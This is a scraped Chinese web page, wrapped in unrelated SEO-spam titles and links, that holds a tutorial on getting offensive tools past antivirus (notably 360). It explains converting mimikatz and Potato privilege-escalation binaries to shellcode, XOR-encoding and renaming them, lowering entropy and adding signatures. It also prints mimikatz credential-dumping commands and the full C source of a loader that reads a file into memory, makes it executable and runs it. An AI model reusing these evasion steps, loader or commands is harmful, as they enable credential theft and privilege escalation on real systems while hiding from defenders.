当前位置: 首页 > news >正文

建筑网站的功能模块有哪些服装品牌营销策划方案

建筑网站的功能模块有哪些,服装品牌营销策划方案,电商平台如何做推广,备案服务网站内网工具对抗 首先#xff0c;你需要分析#xff1a; 1、安全工具是否有源代码 2、安全工具源代码逻辑复杂程度 3、当前源代码你是否有能力修改 其次#xff0c;你需要考虑#xff1a; 1、无源码或无能力修改 2、各种异常bug打包问题 3、修改打包后效果也不太好 故…内网工具对抗 首先你需要分析 1、安全工具是否有源代码 2、安全工具源代码逻辑复杂程度 3、当前源代码你是否有能力修改 其次你需要考虑 1、无源码或无能力修改 2、各种异常bug打包问题 3、修改打包后效果也不太好 故 1、非源码修改方式 转换SC利用同C2的加载上线模式进行对抗难度小速度快但效果不一 2、源码修改方式 魔改源码打乱特征的方法重新定义工具项目难度大但修改好后效果稳 操作方法其实大概流程和免杀shellcode差不多都是一个思路 1、将exe转shellcode2、找分离加载器代码3、分离基础上加混淆4、自签名详细信息熵mimkatz 下载猕猴桃下边猕猴桃都是指mimkatz 下载exe以及源代码 源码修改方式 加载源代码这里就不改了sdk不知道为什么加载不出来 非源码修改方式 将猕猴桃改为.bin文件 pe2shc.exe mimikatz.exe mimikatz.bin使用runshc64.exe是可以正常运行的但是这个mimikatz.bin还是被杀。这里可以采用和之前一样的shellcode载入进行使用。 runshc64.exe mimikatz.bin将mimikatz.bin进行异或0x55进行保存 新建mimikatz项目将项目之前的清单那些关闭。 代码重新生成 将之前的mimikatz.bin重命名为猕猴桃.bin生成的exeu也换成猕猴桃.exe经过测试mimikatz这个名字会直接报毒。 换好后直接测试。 放到360报qvm202换东西即可之前提到过。 减少熵值 增加图标签名 代码做了动态api修改 #获取权限 privilege::debug#抓取密码 sekurlsa::logonpasswords在执行sekurlsa::logonpasswords是有可能被360抓取到的这个就涉及到源码修改绕过。 提权脚本 常规土豆家族提权exe对于杀毒直接就是查杀的状态这里和上边的一样的操作即可。有部分无法使用 pe2shc.exe F:\shellcodeTest\工具免杀\土豆系列EXE\CandyPotato.exe CandyPotato.bin这里不用异或直接做一个加载器上线即可。 360报qvm202按照上面的解决方法即可 但是换一个思路加载器加载.bin文件直接执行不写一个文件用户自定义上传。 #include windows.h #include stdint.h #include cstdiotypedef BOOL(WINAPI* pVirtualProtect)(LPVOID lpAddress,SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect); pVirtualProtect VProtect (pVirtualProtect)GetProcAddress(GetModuleHandleA(Kernel32.dll), VirtualProtect);typedef LPVOID(WINAPI* pVirtualAlloc)(LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect); pVirtualAlloc VAlloc (pVirtualAlloc)GetProcAddress(GetModuleHandleA(Kernel32.dll), VirtualAlloc);unsigned char* inputFile(const char* filename, int len) {FILE* fp NULL;int err fopen_s(fp, filename, rb);if (err ! 0 || !fp) {exit(-1);}fseek(fp, 0, SEEK_END);len ftell(fp);rewind(fp);unsigned char* lpAddress (unsigned char*)malloc(len);fread(lpAddress, 1, len, fp);fclose(fp);return lpAddress; }int main(int argc, char* argv[]) {if (argc 2) {printf(Usage: %s filename\n, argv[0]);return -1;}const char* filename argv[1];void* runtime;BOOL retval;DWORD old_protect 0;unsigned char* payload;int payload_len;payload inputFile(filename, payload_len);runtime VAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);RtlMoveMemory(runtime, payload, payload_len);retval VProtect(runtime, payload_len, PAGE_EXECUTE_READWRITE, old_protect);if (retval ! 0){int (*func)();func (int (*)())runtime;func();}VirtualFree(runtime, payload_len, MEM_RELEASE);return 0; }pe2shc.exe JuicyPotatoNG.exe JuicyPotatoNG.bin失败的
http://www.zqtcl.cn/news/164453/

相关文章:

  • 网站设计相似侵权吗免费游戏网站建设
  • 湖北长安建设网站制作一个网站的步骤是什么
  • js网站开发成都房地产最新政策
  • 天津网站制作维护无锡网络推广外包
  • 国外中文网站排行娱乐新闻做的好的网站
  • 零食网站建设需求分析规划设计网址
  • 建立网站备案的法律依据wordpress 招商系统
  • 建设银行全球门户网站网站建设技能
  • 提供企业网站建设价格10元一年的虚拟主机
  • 塔城建设局网站电子商务网站建设方案目录
  • 网站容易被百度收录个人建购物网站怎么备案
  • 中文网站什么意思wordpress电脑访问不了
  • 杨家坪网站建设企业生产erp软件公司
  • 网站模块设计软件河北seo优化_网络建设营销_网站推广服务 - 河北邢台seo
  • 陕西正天建设有限公司网站西安专业网页制作
  • 网站建设工作室介绍范文seo网站排名的软件
  • 上海网站建设-网建知识可编辑个人简历模板
  • 北京新鸿儒做的网站shopify做国内网站
  • 网站怎样做百度推广机关门户网站建设要求
  • 好看的网站后台模板沧州网站群
  • 深圳做网站排名公司哪家好哪些网站seo做的好
  • 国内网站建设推荐网站建设合同标准版
  • 哈尔滨网站制作费用企业成品网站模板
  • 网络广告网站怎么做北京海淀建设中路哪打疫苗
  • 房地产公司网站制作电影发布网站模板
  • 如何利用开源代码做网站网站本科
  • 公司是做小程序还是做网站宜宾住房与城乡建设部网站
  • 做网站哪个公司最社区问答网站开发
  • 网站引量方法网站建设推广页
  • 书店网站的建设网络营销方法有哪些